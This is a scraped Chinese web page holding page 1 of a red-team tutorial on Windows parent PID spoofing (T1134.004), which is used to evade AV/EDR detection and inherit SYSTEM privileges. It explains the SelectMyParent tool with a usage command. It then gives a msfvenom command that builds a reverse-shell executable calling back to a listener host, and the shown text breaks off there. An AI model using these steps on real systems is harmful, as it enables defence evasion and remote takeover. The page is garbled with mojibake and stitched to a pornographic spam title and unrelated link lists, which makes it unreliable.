人人妻人人澡人人爽精品欧美,综合无码一区二区三区四区五区

概述
父進程欺騙是一種訪問令牌操作技術，通過將惡意文件的PPID指定為explorer.exe等合法進程的PPID，可幫助攻擊者規(guī)避啟發(fā)式檢測等防御技術。
該欺騙可通過使用本地API調用來執(zhí)行，該調用可幫助攻擊者顯式指定PID，如C++中的CreateProcess調用。正如我們將在本文中看到的那樣，這種顯式分配也可能具有某些附帶好處。
MITRE 戰(zhàn)術：權限提升（TA0004）和防御規(guī)避（TA0005）
MITRE ATT&CK技術：T1134 ：Windows訪問令牌模擬竊取以及利用
子技術：T1134.004 ：訪問令牌操作：父 PID 欺騙
背景：
子進程監(jiān)控是威脅狩獵中最常見的指標之一。應急響應人員可能會分析如果 conhost.exe 或 cmd.exe 進程是從 Adobe Reader 或 MS Excel 等零相關的應用生成的，則表明可能存在潛在威脅。安全防護軟件會在啟發(fā)式檢測下監(jiān)控此行為，并向管理員發(fā)出警報。
父PID(PPID)欺騙方法可以繞過 AV/EDR檢測，使其認為是 lsass.exe 這樣的合法進程在進行活動。它通過欺騙進程的 PID 以匹配其父進程的 PID 來做到這一點。這種方法可能帶來的另一個好處是，如果父進程以 SYSTEM 權限運行，則可以憑借訪問令牌的繼承，使其子進程也具有相同的 SYSTEM 權限。
1.網絡安全多個方向學習路線
2.全網最全的CTF入門學習資料
3.一線大佬實戰(zhàn)經驗分享筆記
4.網安大廠面試題合集
5.紅藍對抗實戰(zhàn)技術秘籍
6.網絡安全基礎入門、Linux、web安全、滲透測試方面視頻
進程、PID和PPID
進程：在 Windows 中，應用程序由一個或多個進程組成。簡單來說，當前正在運行的程序的一部分稱為進程。不同的應用程序可能會使用相同的進程(如cmd.exe)，并且為避免歧義，會分配一個整數來區(qū)分一個進程和另一個進程。該整數稱為PID 。
PID：代表進程標識符 (PID)，它是正在運行的進程的數字表示。Windows 中通過 GetCurrentProcessID() 函數返回指定進程的 PID 。
父進程：父進程是可以派生多個子進程的進程。例如，命令explorer.exe /e,/root,"C：\WINDOWS\System32\cmd.exe"將派生cmd.exe作為父進程explorer.exe的子進程。在代碼中，父進程可以使用fork()系統(tǒng)調用來派生子進程。
PPID：代表父進程標識符(PPID)，它是提供給父進程的數字表示形式。任何包含子進程的進程都存在父子關系。
方法一（使用C++程序進行PID欺騙）
Didier Stevens 最初在這里的帖子中談到了Windows API——"CreateProcess"這種方法。還發(fā)布了一個用C++編寫的利用程序(SelectMyParent）。代碼可以在這里下載：***/web/20210225035252/***/files/software/SelectMyParent_v0_0_0_1.zip

請注意，如果您使用的是更高版本的Visual Studio，可能需要重新生成此EXE 。在Visual Studio2022中，我刪除了Debug and Release文件夾中的SelectMyParent.pdb文件，并重新生成了項目以使其運行。

在進程管理器中，你會看到 explorer.exe 在 PID 1624 上運行

文章插圖
因此，要在這個父 explorer.exe進程下運行我們自己的二進制文件，可以像這樣使用 SelectMyParent.exe，你會看到在 PID 1624下創(chuàng)建了一個新進程。
E:\>SelectMyParent.exe notepad 1624

文章插圖

文章插圖
可以看到在PID 2836啟動了notepad.exe
同樣，我們也可以運行自己的EXE 。讓我們先用msfvenom創(chuàng)建一個可以反彈shell的exe

# msfvenom -p windows/shell_reverse_tcp -f exe LHOST=172.19.218.248 LPORT=7777 > shell.exe
上一頁
1
2
3
4
下一頁
		  	推薦閱讀

           
                  
              
                  關于節(jié)約糧食的名言詩句 關于節(jié)約糧食的名言和詩句 
                
                   
                
              
            

                  
              
                  奮斗勵志朋友圈句子 勵志短句致自己奮斗朋友圈 
                
                   
                
              
            

                  
              
                  想發(fā)朋友圈表示心情不好的句子 心情不好發(fā)朋友圈的句子 心情短句 
                
                   
                
              
            

                  
              
                  貝拉玻尿酸是合法的嗎 貝拉玻尿酸是進口的還是國產的 
                
                   
                
              
            

                  
              
                  核桃仁做菜的菜譜，您知道桃仁脆溜雞的做法 
                
                   
                
              
            

                  
              
                  淺紫色顯皮膚黑還是白 
                
                   
                
              
            

                  
              
                  庫倫旗景點 
                
                   
                
              
            

                  
              
                  居家隔離和集中隔離的區(qū)別 什么情況下要隔離28天 
                
                   
                
              
            

                  
              
                  蟬蛹是什么 
                
                   
                
              
            

                  
              
                  怎樣能豐胸最安全有效 
                
                   
                
              
            

          











六級聽力選項規(guī)律 六級聽力怎么提高 
 win7系統(tǒng)殘留文件無法刪除如何解決|win7系統(tǒng)殘留文件刪不掉的解決方法 
 怎么在win10上玩xbox游戲 xbox怎么玩 
 anki記憶方法步驟 anki怎么用 
 手機副卡要月租費嗎 移動副卡怎么收費 
 恒大地產公司怎么樣 恒大地產怎么樣 
 win7怎么進入注冊表|win7注冊表編輯器在哪里打開 
 psgif動態(tài)圖制作步驟 ps怎么做gif 
 win7動態(tài)主題壁紙如何設置？win7桌面換動態(tài)主題壁紙的方法

T1134 紅隊技術-父進程欺騙

推薦閱讀

關于節(jié)約糧食的名言詩句關于節(jié)約糧食的名言和詩句

奮斗勵志朋友圈句子勵志短句致自己奮斗朋友圈

想發(fā)朋友圈表示心情不好的句子心情不好發(fā)朋友圈的句子心情短句

貝拉玻尿酸是合法的嗎貝拉玻尿酸是進口的還是國產的

核桃仁做菜的菜譜，您知道桃仁脆溜雞的做法

淺紫色顯皮膚黑還是白

庫倫旗景點

居家隔離和集中隔離的區(qū)別什么情況下要隔離28天

蟬蛹是什么

怎樣能豐胸最安全有效